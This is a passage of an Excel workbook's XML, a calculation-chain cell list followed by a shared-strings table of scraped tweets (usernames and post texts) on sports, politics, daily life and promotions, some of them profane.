  <c r="A5034" i="1"/>
  <c r="A5033" i="1"/>
  <c r="A5032" i="1"/>
  <c r="A5031" i="1"/>
  <c r="A5030" i="1"/>
  <c r="A5029" i="1"/>
  <c r="A5028" i="1"/>
  <c r="A5027" i="1"/>
  <c r="A5026" i="1"/>
  <c r="A5025" i="1"/>
  <c r="A5024" i="1"/>
  <c r="A5023" i="1"/>
  <c r="A5022" i="1"/>
  <c r="A5021" i="1"/>
  <c r="A5020" i="1"/>
  <c r="A5019" i="1"/>
  <c r="A5018" i="1"/>
  <c r="A5017" i="1"/>
  <c r="A5016" i="1"/>
  <c r="A5015" i="1"/>
  <c r="A5014" i="1"/>
  <c r="A5013" i="1"/>
  <c r="A5012" i="1"/>
  <c r="A5011" i="1"/>
  <c r="A5010" i="1"/>
  <c r="A5009" i="1"/>
  <c r="A5008" i="1"/>
  <c r="A5007" i="1"/>
  <c r="A5006" i="1"/>
  <c r="A5005" i="1"/>
  <c r="A5004" i="1"/>
  <c r="A5003" i="1"/>
  <c r="A5002" i="1"/>
  <c r="A5001" i="1"/>
  <c r="A5000" i="1"/>
  <c r="A4999" i="1"/>
  <c r="A4998" i="1"/>
  <c r="A4997" i="1"/>
  <c r="A4996" i="1"/>
  <c r="A4995" i="1"/>
  <c r="A4994" i="1"/>
  <c r="A4993" i="1"/>
  <c r="A4992" i="1"/>
  <c r="A4991" i="1"/>
  <c r="A4990" i="1"/>
  <c r="A4989" i="1"/>
  <c r="A4988" i="1"/>
  <c r="A4987" i="1"/>
  <c r="A4986" i="1"/>
  <c r="A4985" i="1"/>
  <c r="A4984" i="1"/>
  <c r="A4983" i="1"/>
  <c r="A4982" i="1"/>
  <c r="A4981" i="1"/>
  <c r="A4980" i="1"/>
  <c r="A4979" i="1"/>
  <c r="A4978" i="1"/>
  <c r="A4977" i="1"/>
  <c r="A4976" i="1"/>
  <c r="A4975" i="1"/>
  <c r="A4974" i="1"/>
  <c r="A4973" i="1"/>
  <c r="A4972" i="1"/>
  <c r="A4971" i="1"/>
  <c r="A4970" i="1"/>
  <c r="A4969" i="1"/>
  <c r="A4968" i="1"/>
  <c r="A4967" i="1"/>
  <c r="A4966" i="1"/>
  <c r="A4965" i="1"/>
  <c r="A4964" i="1"/>
  <c r="A4963" i="1"/>
  <c r="A4962" i="1"/>
  <c r="A4961" i="1"/>
  <c r="A4960" i="1"/>
  <c r="A4959" i="1"/>
  <c r="A4958" i="1"/>
  <c r="A4957" i="1"/>
  <c r="A4956" i="1"/>
  <c r="A4955" i="1"/>
  <c r="A4954" i="1"/>
  <c r="A4953" i="1"/>
  <c r="A4952" i="1"/>
  <c r="A4951" i="1"/>
  <c r="A4950" i="1"/>
  <c r="A4949" i="1"/>
  <c r="A4948" i="1"/>
  <c r="A4947" i="1"/>
  <c r="A4946" i="1"/>
  <c r="A4945" i="1"/>
  <c r="A4944" i="1"/>
  <c r="A4943" i="1"/>
  <c r="A4942" i="1"/>
  <c r="A4941" i="1"/>
  <c r="A4940" i="1"/>
  <c r="A4939" i="1"/>
  <c r="A4938" i="1"/>
  <c r="A4937" i="1"/>
  <c r="A4936" i="1"/>
  <c r="A4935" i="1"/>
  <c r="A4934" i="1"/>
  <c r="A4933" i="1"/>
  <c r="A4932" i="1"/>
  <c r="A4931" i="1"/>
  <c r="A4930" i="1"/>
  <c r="A4929" i="1"/>
  <c r="A4928" i="1"/>
  <c r="A4927" i="1"/>
  <c r="A4926" i="1"/>
  <c r="A4925" i="1"/>
  <c r="A4924" i="1"/>
  <c r="A4923" i="1"/>
  <c r="A4922" i="1"/>
  <c r="A4921" i="1"/>
  <c r="A4920" i="1"/>
  <c r="A4919" i="1"/>
  <c r="A4918" i="1"/>
  <c r="A4917" i="1"/>
  <c r="A4916" i="1"/>
  <c r="A4915" i="1"/>
  <c r="A4914" i="1"/>
  <c r="A4913" i="1"/>
  <c r="A4912" i="1"/>
  <c r="A4911" i="1"/>
  <c r="A4910" i="1"/>
  <c r="A4909" i="1"/>
  <c r="A4908" i="1"/>
  <c r="A4907" i="1"/>
  <c r="A4906" i="1"/>
  <c r="A4905" i="1"/>
  <c r="A4904" i="1"/>
  <c r="A4903" i="1"/>
  <c r="A4902" i="1"/>
  <c r="A4901" i="1"/>
  <c r="A4900" i="1"/>
  <c r="A4899" i="1"/>
  <c r="A4898" i="1"/>
  <c r="A4897" i="1"/>
  <c r="A4896" i="1"/>
  <c r="A4895" i="1"/>
  <c r="A4894" i="1"/>
  <c r="A4893" i="1"/>
  <c r="A4892" i="1"/>
  <c r="A4891" i="1"/>
  <c r="A4890" i="1"/>
  <c r="A4889" i="1"/>
  <c r="A4888" i="1"/>
  <c r="A4887" i="1"/>
  <c r="A4886" i="1"/>
  <c r="A4885" i="1"/>
  <c r="A4884" i="1"/>
  <c r="A4883" i="1"/>
  <c r="A4882" i="1"/>
  <c r="A4881" i="1"/>
  <c r="A4880" i="1"/>
  <c r="A4879" i="1"/>
  <c r="A4878" i="1"/>
  <c r="A4877" i="1"/>
  <c r="A4876" i="1"/>
  <c r="A4875" i="1"/>
  <c r="A4874" i="1"/>
  <c r="A4873" i="1"/>
  <c r="A4872" i="1"/>
  <c r="A4871" i="1"/>
  <c r="A4870" i="1"/>
  <c r="A4869" i="1"/>
  <c r="A4868" i="1"/>
  <c r="A4867" i="1"/>
  <c r="A4866" i="1"/>
  <c r="A4865" i="1"/>
  <c r="A4864" i="1"/>
  <c r="A4863" i="1"/>
  <c r="A4862" i="1"/>
  <c r="A4861" i="1"/>
  <c r="A4860" i="1"/>
  <c r="A4859" i="1"/>
  <c r="A4858" i="1"/>
  <c r="A4857" i="1"/>
  <c r="A4856" i="1"/>
  <c r="A4855" i="1"/>
  <c r="A4854" i="1"/>
  <c r="A4853" i="1"/>
  <c r="A4852" i="1"/>
  <c r="A4851" i="1"/>
  <c r="A4850" i="1"/>
  <c r="A4849" i="1"/>
  <c r="A4848" i="1"/>
  <c r="A4847" i="1"/>
  <c r="A4846" i="1"/>
  <c r="A4845" i="1"/>
  <c r="A4844" i="1"/>
  <c r="A4843" i="1"/>
  <c r="A4842" i="1"/>
  <c r="A4841" i="1"/>
  <c r="A4840" i="1"/>
  <c r="A4839" i="1"/>
  <c r="A4838" i="1"/>
  <c r="A4837" i="1"/>
  <c r="A4836" i="1"/>
  <c r="A4835" i="1"/>
  <c r="A4834" i="1"/>
  <c r="A4833" i="1"/>
  <c r="A4832" i="1"/>
  <c r="A4831" i="1"/>
  <c r="A4830" i="1"/>
  <c r="A4829" i="1"/>
  <c r="A4828" i="1"/>
  <c r="A4827" i="1"/>
  <c r="A4826" i="1"/>
  <c r="A4825" i="1"/>
  <c r="A4824" i="1"/>
  <c r="A4823" i="1"/>
  <c r="A4822" i="1"/>
  <c r="A4821" i="1"/>
  <c r="A4820" i="1"/>
  <c r="A4819" i="1"/>
  <c r="A4818" i="1"/>
  <c r="A4817" i="1"/>
  <c r="A4816" i="1"/>
  <c r="A4815" i="1"/>
  <c r="A4814" i="1"/>
  <c r="A4813" i="1"/>
  <c r="A4812" i="1"/>
  <c r="A4811" i="1"/>
  <c r="A4810" i="1"/>
  <c r="A4809" i="1"/>
  <c r="A4808" i="1"/>
  <c r="A4807" i="1"/>
  <c r="A4806" i="1"/>
  <c r="A4805" i="1"/>
  <c r="A4804" i="1"/>
  <c r="A4803" i="1"/>
  <c r="A4802" i="1"/>
  <c r="A4801" i="1"/>
  <c r="A4800" i="1"/>
  <c r="A4799" i="1"/>
  <c r="A4798" i="1"/>
  <c r="A4797" i="1"/>
  <c r="A4796" i="1"/>
  <c r="A4795" i="1"/>
  <c r="A4794" i="1"/>
  <c r="A4793" i="1"/>
  <c r="A4792" i="1"/>
  <c r="A4791" i="1"/>
  <c r="A4790" i="1"/>
  <c r="A4789" i="1"/>
  <c r="A4788" i="1"/>
  <c r="A4787" i="1"/>
  <c r="A4786" i="1"/>
  <c r="A4785" i="1"/>
  <c r="A4784" i="1"/>
  <c r="A4783" i="1"/>
  <c r="A4782" i="1"/>
  <c r="A4781" i="1"/>
  <c r="A4780" i="1"/>
  <c r="A4779" i="1"/>
  <c r="A4778" i="1"/>
  <c r="A4777" i="1"/>
  <c r="A4776" i="1"/>
  <c r="A4775" i="1"/>
  <c r="A4774" i="1"/>
  <c r="A4773" i="1"/>
  <c r="A4772" i="1"/>
  <c r="A4771" i="1"/>
  <c r="A4770" i="1"/>
  <c r="A4769" i="1"/>
  <c r="A4768" i="1"/>
  <c r="A4767" i="1"/>
  <c r="A4766" i="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G18348" i="1"/>
  <c r="E16681" i="1"/>
  <c r="G16001" i="1"/>
  <c r="E15890" i="1"/>
  <c r="E8297" i="1"/>
  <c r="E6969" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="77442" uniqueCount="31923">
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Country</t>
  </si>
  <si>
    <t>Contents</t>
  </si>
  <si>
    <t>TWITTER</t>
  </si>
  <si>
    <t>drjohnkanca3</t>
  </si>
  <si>
    <t>@washingtonpost The heroes were in those planes and those Towers and in the Pentagon. The heroes were the first responders. This is pure virtue signalling and calling her a "hero" cheapens the word.</t>
  </si>
  <si>
    <t>Eleven88degrees</t>
  </si>
  <si>
    <t>shut the fuck up my guy.</t>
  </si>
  <si>
    <t>ForeverSlime1</t>
  </si>
  <si>
    <t>Add me to fifa gcs 😁</t>
  </si>
  <si>
    <t>KennethT_Realty</t>
  </si>
  <si>
    <t>Even #Millennials are buying homes 😉! Looking to buy? #Fall is great time to &amp; move in before holidays, Call 617-959-5500 #kennetht_realty #buyersagent #homebuying #dreamhome #icanhelp #homes #greaterbostonhomes #northshorehomes #homeequity https://t.co/SzC8YdXjd2 https://t.co/I9cwsiVXif</t>
  </si>
  <si>
    <t>ParentRdMin</t>
  </si>
  <si>
    <t>Well, that was unusual! We don't answer phone numbers we don't know. Today a caller left a message singing. 🎶 The style &amp; language reminded me of India. Good voice &amp; nice melody, but why did he call? 🤷‍♀️</t>
  </si>
  <si>
    <t>thebramblemen</t>
  </si>
  <si>
    <t>@NYPostOpinion This effing a hole is a political scientist, economist and “skeptical environmentalist” a climate change contrarian. The world is melting, flooding, burning before our eyes, bigly. Yes the whole world needs to make changes. Abdicating leadership by leaving table is NOT the answer https://t.co/lnhQO9mpKV</t>
  </si>
  <si>
    <t>DailyGameSale</t>
  </si>
  <si>
    <t>https://t.co/7Yi7wMKjR9 - Buy Call of Duty: Infinite Warfare for $11.95 - Over 80% off! https://t.co/2lw5aj3Y6G #Call #Duty: #Infinite # https://t.co/fzFu5G7MY5</t>
  </si>
  <si>
    <t>flags_we</t>
  </si>
  <si>
    <t>@graviss_s Cheers! 🍺 Just working hard building our presence and brand! Hope you’re having a great day!</t>
  </si>
  <si>
    <t>cptnwillie</t>
  </si>
  <si>
    <t>@dukewindsor388 He’s been doing this all along. He denies what he said earlier &amp; those who follow him consider it The Gospel of Donald. They’re ignorant &amp; lazy. They have a 5 minute attention span &amp; they stupidly can’t add up the facts &amp; think independently.</t>
  </si>
  <si>
    <t>MetroBooty</t>
  </si>
  <si>
    <t>@ARossSucksToes @ICamHoop_1 @colingause1 They need to hit me up cause I need to retire too this stress killing me! 😂</t>
  </si>
  <si>
    <t>justmeinlv</t>
  </si>
  <si>
    <t>@iggasuz @SassyKadiK It’s Paul Irving and I cannot figure out if he’s a democrat, independent, or a nazi.</t>
  </si>
  <si>
    <t>SashaBrian1</t>
  </si>
  <si>
    <t>Instacart Is Revising Its Outrageous Tipping Policy, Following Public Outrage The grocery delivery app was using tips to subsidize delivery payments App-based grocery delivery service Instacart announced today that it is rolling back an underhanded https://t.co/9CGeRNhQGa</t>
  </si>
  <si>
    <t>secretmars</t>
  </si>
  <si>
    <t>FYI the dog is alive! She seems ok too</t>
  </si>
  <si>
    <t>GleasBball</t>
  </si>
  <si>
    <t>Michigan-Wisconsin game seems to have a review after every other play so far</t>
  </si>
  <si>
    <t>Armstrong_VO</t>
  </si>
  <si>
    <t>The art of the storyteller, like any art, demands objective, candid self-assessment. Look inside and make sure you’re seeing your strengths, weaknesses and motivations accurately.</t>
  </si>
  <si>
    <t>MattGrumbrecht</t>
  </si>
  <si>
    <t>So I guess the Browns didn’t win the division in week one afterall.</t>
  </si>
  <si>
    <t>dokfuy</t>
  </si>
  <si>
    <t>@mayeezus the betrayal is real</t>
  </si>
  <si>
    <t>notkaley</t>
  </si>
  <si>
    <t>i want kiss and to be drunk</t>
  </si>
  <si>
    <t>missmohunnids</t>
  </si>
  <si>
    <t>I can’t wait to finish the drive to Van tomorrow then take a nap for the next 3 days.</t>
  </si>
  <si>
    <t>mischawatson</t>
  </si>
  <si>
    <t>@WoyHattersly Is the LibDem position that they'd revoke, have a referendum and then activate A50 again if leave wins again?</t>
  </si>
  <si>
    <t>Archimamamia</t>
  </si>
  <si>
    <t>@JessicaGirardo Anytime you feel tired, weak, less than or low, let me know...I will try to perk you up!...my goal right now is to get enough energy to ride my bike which I haven’t been able to do for almost 2 years..and I really miss it!</t>
  </si>
  <si>
    <t>KaymenKova</t>
  </si>
  <si>
    <t>I missed everything going on with Aaron Carter The last few days. It's very clear he's been hurt alot. I hope everything works out for him.</t>
  </si>
  <si>
    <t>faith0m</t>
  </si>
  <si>
    <t>@husbandcheeks @avodkabottle Yeah I'd say also black eagle... :3 Vienna vs Hubert would be hilarious honestly... Klaus would probably butt heads w Ferdinand VON AEGIR all the time ahaha but I can see Elise liking Ferdie initially lmao</t>
  </si>
  <si>
    <t>LeDavidCurran</t>
  </si>
  <si>
    <t>@soult As a big-city person I'm always surprised to find places that have this almost eerily quiet phase after the shops close but before the evening places (if indeed there are any) get going. Some of the shops here do most of their turnover in the evening rush between 5 and 8pm!</t>
  </si>
  <si>
    <t>Bry4n_Bassett</t>
  </si>
  <si>
    <t>@semajjames0 @RivalsWoody @njrivals1 @JohnGarcia_Jr @RandyMoss went to Marshall!! Great school!!</t>
  </si>
  <si>
    <t>azina</t>
  </si>
  <si>
    <t>@RealSaavedra Ultimately the thing that changed my mind from a very Texas mentality of never touch 2A at all for any reason was learning from @jamietworkowski that those who attempt suicide with a gun are more likely to succeed. That broke my heart. As a mental health advocate, as someone with</t>
  </si>
  <si>
    <t>BongoBoyiSpin</t>
  </si>
  <si>
    <t>#NowPlaying Les Fradkin - Attack! on @BongoBoyIspin to submit@bongoboyrecords.com your music #indiemusic @bongoboyrecords</t>
  </si>
  <si>
    <t>taravancil</t>
  </si>
  <si>
    <t>Thanks to everyone who’s made me feel at home here. I love this city and I love you &lt;3</t>
  </si>
  <si>
    <t>JMcNChicago</t>
  </si>
  <si>
    <t>Trump supporter flattened for pushing debunked Biden smear: This is what ‘happens in a banana republic’ https://t.co/IOgkTccB7P</t>
  </si>
  <si>
    <t>GrapplerX</t>
  </si>
  <si>
    <t>@dhancock110 Is what you do currently defined as “job” though? I didn’t know organizing a clusterfck every few months to drain the wallet of marks is an actually job...I’m in the wrong business</t>
  </si>
  <si>
    <t>CivicDMV</t>
  </si>
  <si>
    <t>#civicaction #dmv #today Volunteer Action Night for the Environment https://t.co/ay6xju0ukb #act https://t.co/njatapyJSM</t>
  </si>
  <si>
    <t>Barney_WI</t>
  </si>
  <si>
    <t>Thankyou so much @_ryanmackenzie for the stunning arrangement &amp; @stevecorleykeys for playing it so beautifully.</t>
  </si>
  <si>
    <t>crt_247</t>
  </si>
  <si>
    <t>Last 24 Hours = 3 Followers and 1 Unfollowers (stats by https://t.co/WUvsuhCeQP)</t>
  </si>
  <si>
    <t>ProtectionRed</t>
  </si>
  <si>
    <t>#securityguard #securityofficer #nyssecuritytraining #training #bevigilantandstaysafe #bvass #thinyellowline #Mountainview #Wyoming #gender #firing #nyssecurityguardtraining #strongisland #rdpc #StateCertified Be Vigilant and Stay Safe! https://t.co/PiQX2PJFU5</t>
  </si>
  <si>
    <t>nihilistsyko</t>
  </si>
  <si>
    <t>okay update i saw him front row and he’s so peng wtf</t>
  </si>
  <si>
    <t>ayalamarine</t>
  </si>
  <si>
    <t>@MyDesert I wonder if the parked tractor was because of the ELDS</t>
  </si>
  <si>
    <t>tx_freedomfight</t>
  </si>
  <si>
    <t>@inthecopa @dahdae12 @DWStweets tried a drive by on a well fortified, MAN with a spine. Congress, especially @TheDemocrats soy boys haven't got an answer for someone who will say and defend the truth. That is why they hate @realDonaldTrump. The pussies won't go toe to toe. They would rather backstab</t>
  </si>
  <si>
    <t>kealiepretz</t>
  </si>
  <si>
    <t>Accurate depiction of flood control channel, staff plate and all! Nice work #untitledgoosegame https://t.co/5mFGR4oaT0</t>
  </si>
  <si>
    <t>RiSSA_JADE</t>
  </si>
  <si>
    <t>The first few steps may be the hardest part of your creative p... More for Virgo https://t.co/iwe3NnMG07</t>
  </si>
  <si>
    <t>charletariat</t>
  </si>
  <si>
    <t>tomorrow is friday the 13 th and a full moon if someone doesn't send me a job offer</t>
  </si>
  <si>
    <t>HyattsvllePatch</t>
  </si>
  <si>
    <t>Fortune recently released its annual ranking of the best workplaces for women, and a few Maryland companies made the list. https://t.co/4LY6kRRZy1</t>
  </si>
  <si>
    <t>kamil_jabbar</t>
  </si>
  <si>
    <t>Why’s it every time I need a trim my barber decides to take a day off</t>
  </si>
  <si>
    <t>BTGreen87</t>
  </si>
  <si>
    <t>@billy_cali @HuskerExtraSip Guise calm down he wa ankle weights on in non conference play, wait till they come off for Ohio St.</t>
  </si>
  <si>
    <t>SpayMartCat</t>
  </si>
  <si>
    <t>Why Does My Cat Like to Knock Things Off the Table? https://t.co/9CV9KYsLLt via @ThinkLikeaCat</t>
  </si>
  <si>
    <t>mikeuf88</t>
  </si>
  <si>
    <t>@Covers_Vegas @southpointlv Just booked! Will be there oct 12th and 13th for a full day of football betting/watching can’t wait! @andrewssports @beatingthebook</t>
  </si>
  <si>
    <t>a_tiny_bird</t>
  </si>
  <si>
    <t>My gf and i are getting more powerful by the day</t>
  </si>
  <si>
    <t>KMackMcTighe</t>
  </si>
  <si>
    <t>@jrpatino12 @PaulGerke @12News Nah, they're three year's away and the Niners are becoming the force of the division. The Rams have a young squad also</t>
  </si>
  <si>
    <t>b_jacksonnn</t>
  </si>
  <si>
    <t>Watching ghost adventures like I don’t gotta be up in 3 hours 🙂🙂🙂🙂</t>
  </si>
  <si>
    <t>CChaney3000</t>
  </si>
  <si>
    <t>@EAMaddenMobile how long is the maintenance gonna be</t>
  </si>
  <si>
    <t>TCUnderground1</t>
  </si>
  <si>
    <t>I'm excited. Just found out FKA is coming to town in November and tickets goes on sale tomorrow for presales. #NP - FKA twigs - Cellophane https://t.co/u2n9qrMS5v via @youtube</t>
  </si>
  <si>
    <t>aradder33</t>
  </si>
  <si>
    <t>@sonoad @NealBish Superb and I'm the one that's blinkered? So if you went to work tomorrow put in a poor performance and made stupid decisions you'd just blame the boss? No accountability for your professional performance?</t>
  </si>
  <si>
    <t>SAScience</t>
  </si>
  <si>
    <t>Scientists Confirm The Discovery of a Mineral Never Before Seen in Nature https://t.co/6nEoRMOpPy #science https://t.co/sdUcsOezi7</t>
  </si>
  <si>
    <t>LeadershipandMo</t>
  </si>
  <si>
    <t>JOIN THE CONVERSATION Are you holding onto something that you need to let go of? What’s stopping you? https://t.co/lsQK1Mfcjt #betheleader https://t.co/j9bLZfSzz2</t>
  </si>
  <si>
    <t>miche2my</t>
  </si>
  <si>
    <t>@AllieCowley6 @girlygirlsguide That must be really tough then, I’m glad you had her though.. all I remember is my mum being really short and baking all the time and made me clean brass.</t>
  </si>
  <si>
    <t>1031WIRK</t>
  </si>
  <si>
    <t>Storm Update: @Uber is offering free round trip rides to several evacuation shelters in Florida! For more info click the link: https://t.co/p3IHGwB3rR https://t.co/Q83mraR4qR</t>
  </si>
  <si>
    <t>Apple</t>
  </si>
  <si>
    <t>@kiyahwhitman, thanks. Stay tuned. We'll send a reminder before the #AppleEvent on September 10, at 10 a.m. PDT. Reply #stop to opt out. https://t.co/nE6FcJwT2Z</t>
  </si>
  <si>
    <t>QuorumCall</t>
  </si>
  <si>
    <t>Fallon to Explore Primary Challenge to Cornyn https://t.co/Q8tXj3ydsT @JohnCornyn</t>
  </si>
  <si>
    <t>NPedowitz</t>
  </si>
  <si>
    <t>I just gave to Mike Levin (CA-49). Join me! https://t.co/5ZZd9zWSXb This 1st term Democrat Congressman is under attack. He just turned a historically red district BLUE. If you’re concerned about America’s future, now’s the time to act. Thank You.</t>
  </si>
  <si>
    <t>ShoelessI</t>
  </si>
  <si>
    <t>@AndrewYang glad to know most doctors you know are #asians Very #Democratic statement, not!</t>
  </si>
  <si>
    <t>MrFnPanic</t>
  </si>
  <si>
    <t>#FF @CookieMIsGod @ElmoIsGodNow , @reajesuschrist for the laughs. All great accounts</t>
  </si>
  <si>
    <t>jman1734</t>
  </si>
  <si>
    <t>@chayrosado Thank you maam for your purchase, your order should get to you in 2-3 business days :)</t>
  </si>
  <si>
    <t>dzuunmod</t>
  </si>
  <si>
    <t>@Max_Leighton If I understand my internet correctly, a Mekon (Yukon)/*the* Mekon (*the* Yukon) convo is about to occur in your mentions. And I am here for it.</t>
  </si>
  <si>
    <t>bilbospizza</t>
  </si>
  <si>
    <t>Greyerz – BUCKLE UP: We Have Just Entered The Explosive Phase In Gold &amp; Silver https://t.co/FAjWsYXz6B</t>
  </si>
  <si>
    <t>manelanddave</t>
  </si>
  <si>
    <t>2' Greening draws the first foul of the match, though it was in Orlando's half of the pitch.</t>
  </si>
  <si>
    <t>MelissaCarlee</t>
  </si>
  <si>
    <t>@ashskyhill @Appleofmyey @ChairmanButters @tomotamvotir @thetruesand Na, that's you and your defense of multimillionaire transphobic comedians.</t>
  </si>
  <si>
    <t>moisesthewriter</t>
  </si>
  <si>
    <t>@cardenasclayton Thank you, sir. Congrats to you!!</t>
  </si>
  <si>
    <t>KellyJeanM1196</t>
  </si>
  <si>
    <t>@ajstortz Eesh... felt the eyes roll in the back of the abyss of my head 😆🙄</t>
  </si>
  <si>
    <t>AndyMorrisLDR</t>
  </si>
  <si>
    <t>David Vasmer accepts the amendment.</t>
  </si>
  <si>
    <t>fsu92nole</t>
  </si>
  <si>
    <t>@flasportsbuzz So the payroll will plunge by $25 mil and it was already 2nd to last. Jeets won’t even commit to a payroll as “high” as this year but states more people need to show up. There is no plan to have a competitive team unless they strike gold on prospects getting paid peanuts.</t>
  </si>
  <si>
    <t>vintageyoongii</t>
  </si>
  <si>
    <t>@txtyeonjunnn tis someone i can stay with for 2hr breaks lol :)</t>
  </si>
  <si>
    <t>BiancaSeth</t>
  </si>
  <si>
    <t>@VeronicaFoale We came home from school &amp; a little Wyandotte’s hatched How long do you leave them? 24/36 hrs? I want to give them all a chance</t>
  </si>
  <si>
    <t>AmberItaly</t>
  </si>
  <si>
    <t>@Sm00vdinero Dang the baby a clown too wow</t>
  </si>
  <si>
    <t>bangishotyou</t>
  </si>
  <si>
    <t>@GCraftyCraft It's the first one I've seen down here. None of the others locally do. This is close to the main one down here they train new employees at, so I wonder if they're trying it out in this city. (Also the store is next to an actual HEB lol)</t>
  </si>
  <si>
    <t>Capcision</t>
  </si>
  <si>
    <t>@2KIntel just tell us if we can skip to a certain date, or do we gotta do a certain amount of practices?</t>
  </si>
  <si>
    <t>TumblTrakUK</t>
  </si>
  <si>
    <t>This week's #TrainingTip is a fun station for beginner athletes working on glides. Set the Power Launch up with your bars and get creative! #tumbltrak https://t.co/o33oENo7Zs</t>
  </si>
  <si>
    <t>giohannabanna</t>
  </si>
  <si>
    <t>I have a set of dice and they’re all in Japanese and I’m trying so hard to remember from my weeb days how characters work ajfkskhddkdb</t>
  </si>
  <si>
    <t>BirdTroutman</t>
  </si>
  <si>
    <t>@CBSBigBrother Absolutely fucking not. Do we feel bad? That this piece of shit for once felt bad about being a piece of shit? Literally everyone involved with this show needs to get the shit kicked out of them at this point</t>
  </si>
  <si>
    <t>akmcclen</t>
  </si>
  <si>
    <t>@tracesoffaith I have extra bones in my feet. (Not an issue except that it makes it harder to find shoes.)</t>
  </si>
  <si>
    <t>_amyw_xx</t>
  </si>
  <si>
    <t>Looks like I ain’t getting any air for a year cos I can’t breathe after that #Peakyblinders</t>
  </si>
  <si>
    <t>DruskiSelfMade</t>
  </si>
  <si>
    <t>Then it would be more better when the #Cowboys smash the giants tomorrow!! 🎊🎉</t>
  </si>
  <si>
    <t>ClnEnergyAction</t>
  </si>
  <si>
    <t>Today it begins! Ready, and . . . STRIKE! https://t.co/0Qbxq4RFbv</t>
  </si>
  <si>
    <t>bella_monico_</t>
  </si>
  <si>
    <t>Furthering your education pays dividends into the future in su... More for Taurus https://t.co/Mi588MNDaJ</t>
  </si>
  <si>
    <t>Borney25</t>
  </si>
  <si>
    <t>@burnsbrian77 @Indians Yeah. Shame on them for thinking they would just walk thru the division.</t>
  </si>
  <si>
    <t>JaniesScrapbook</t>
  </si>
  <si>
    <t>Really had no clue it was 5am...when the heck did I fall asleep and why the heck am I awake now? 😳</t>
  </si>
  <si>
    <t>Danbear1999</t>
  </si>
  <si>
    <t>Men; lead you on for two months straight then tell you "never going happen" because of other issues. I'm sorry, what?</t>
  </si>
  <si>
    <t>PNWSeagal</t>
  </si>
  <si>
    <t>I found out today that my son and his wife are having a baby boy. I am in AK working and they are in Wa st so I missed the reveal. But got tons of video.A Grandson❤️ I'm too young for this😬 I am excited .I can spoil him and then send him home. I am going to get my revenge😂</t>
  </si>
  <si>
    <t>DjNasty803</t>
  </si>
  <si>
    <t>Yessir fuck all the chicks you want son 😂🐐 https://t.co/xObeE5MdhH</t>
  </si>
  <si>
    <t>RacerRifle</t>
  </si>
  <si>
    <t>Little “Match Sling” to start the day! “It’s a Great day to be a Racer!” https://t.co/gNUjqMAwVz</t>
  </si>
  <si>
    <t>KellieConnelly1</t>
  </si>
  <si>
    <t>Call in help from a friend or professional today, and forgo tr... More for Aries https://t.co/YISzxJ293x</t>
  </si>
  <si>
    <t>AGILEartisan</t>
  </si>
  <si>
    <t>#Agile #leadership behaviours! Facilitating a #leancoffee session to tackle this very topic on this stunning late Summer day in #London</t>
  </si>
  <si>
    <t>magicmazzi</t>
  </si>
  <si>
    <t>@gateley43 @13Leafs01 And next year I’m pretty sure Kessels retained 1-2 million comes off</t>
  </si>
  <si>
    <t>_treshaa</t>
  </si>
  <si>
    <t>I dead ass need a workout partner! Like I need to get back into shape &amp; get my body back right 😭</t>
  </si>
  <si>
    <t>Endressa1206</t>
  </si>
  <si>
    <t>@fkeskew @NPR @VlazJenn @hereandnow Exactly!!! That seems to be a trend these days.</t>
  </si>
  <si>
    <t>makenzielampkin</t>
  </si>
  <si>
    <t>don’t say you miss someone &amp; not make an effort to see them</t>
  </si>
  <si>
    <t>ISM_music</t>
  </si>
  <si>
    <t>Join us on Wednesday 25 September to learn the fundamentals of safeguarding including the best practices for musicians. Sign up now: https://t.co/usSvpl9uGv https://t.co/FNdfU6Rn8U</t>
  </si>
  <si>
    <t>nick_chater</t>
  </si>
  <si>
    <t>Attending Disrupt? Get feedback on your pitchdeck, marketing and immigration questions directly from the experts https://t.co/E5YzLpJEqx #EdTech</t>
  </si>
  <si>
    <t>KristinaJulia2</t>
  </si>
  <si>
    <t>@Jeremy4Trump14 @YouTube @Real__Headlines @BjorgeU @Messianic4POTUS @TrumpsCloset lol, the person who sent me that much older and didn’t like them even when they came out lol. I do though.</t>
  </si>
  <si>
    <t>catsarehigh247</t>
  </si>
  <si>
    <t>Ahh yes the dim times #MeTVStarTrek</t>
  </si>
  <si>
    <t>JuniperKilljoy</t>
  </si>
  <si>
    <t>@twodeecumdump I MEAN HE DOES BUT THE THE BLONDE Connie doesn't look half bad either</t>
  </si>
  <si>
    <t>QuirkLogic</t>
  </si>
  <si>
    <t>Individually, we are one drop. Together, we are an ocean #RyunosukeSatoro #theQuilla isn't an all-in-one solution looking to replace laptops, smartphones or #Zoom. We are part of the bigger picture of workplace #collaboration: bringing brainstorming into the future! #QuirkLogic https://t.co/y5fmkqM9PE</t>
  </si>
  <si>
    <t>virgintephy</t>
  </si>
  <si>
    <t>I wanna do poppers and listen to Charli all weekend</t>
  </si>
  <si>
    <t>POCKETS_MOFATTA</t>
  </si>
  <si>
    <t>Y’all won’t buhhhleeeeee the shit that happened to me just now</t>
  </si>
  <si>
    <t>Keyon18717608</t>
  </si>
  <si>
    <t>@PatDStat And both sacks this week was on DW4. Our line is solid! Tunsil is a life changer, both rookies are studs</t>
  </si>
  <si>
    <t>entertained1</t>
  </si>
  <si>
    <t>@DanCrenshawTX Nope. You’re full of shit and obviously haven’t done your homework. https://t.co/O2OwRtiZ3C</t>
  </si>
  <si>
    <t>AzzaBriaunna</t>
  </si>
  <si>
    <t>y’all do way too much for social media lmao but be in my face every day. GOODBYE</t>
  </si>
  <si>
    <t>chuckhable</t>
  </si>
  <si>
    <t>@SNFRules The NFHS has a great rule for blindside blocks. The NFL should look at it.</t>
  </si>
  <si>
    <t>ungdrill</t>
  </si>
  <si>
    <t>BFF didn’t even play his hit. That’s how big his balls are and i have a weird respect for that.</t>
  </si>
  <si>
    <t>dannymohar</t>
  </si>
  <si>
    <t>$TLM.AX $TLM Pretty much behaving as expected, bouncing near prior support, volume still low. watch for any new volume. https://t.co/tk3U5ToJ6y</t>
  </si>
  <si>
    <t>Tahoe_Sushi</t>
  </si>
  <si>
    <t>@Griffin_Phillis @ThatGayWolf @Ditherkins @sillysnowcat Next movie from the studio. Already came out in Japan in July. Will be in USA theaters in early 2020.</t>
  </si>
  <si>
    <t>Aquaberry_KH</t>
  </si>
  <si>
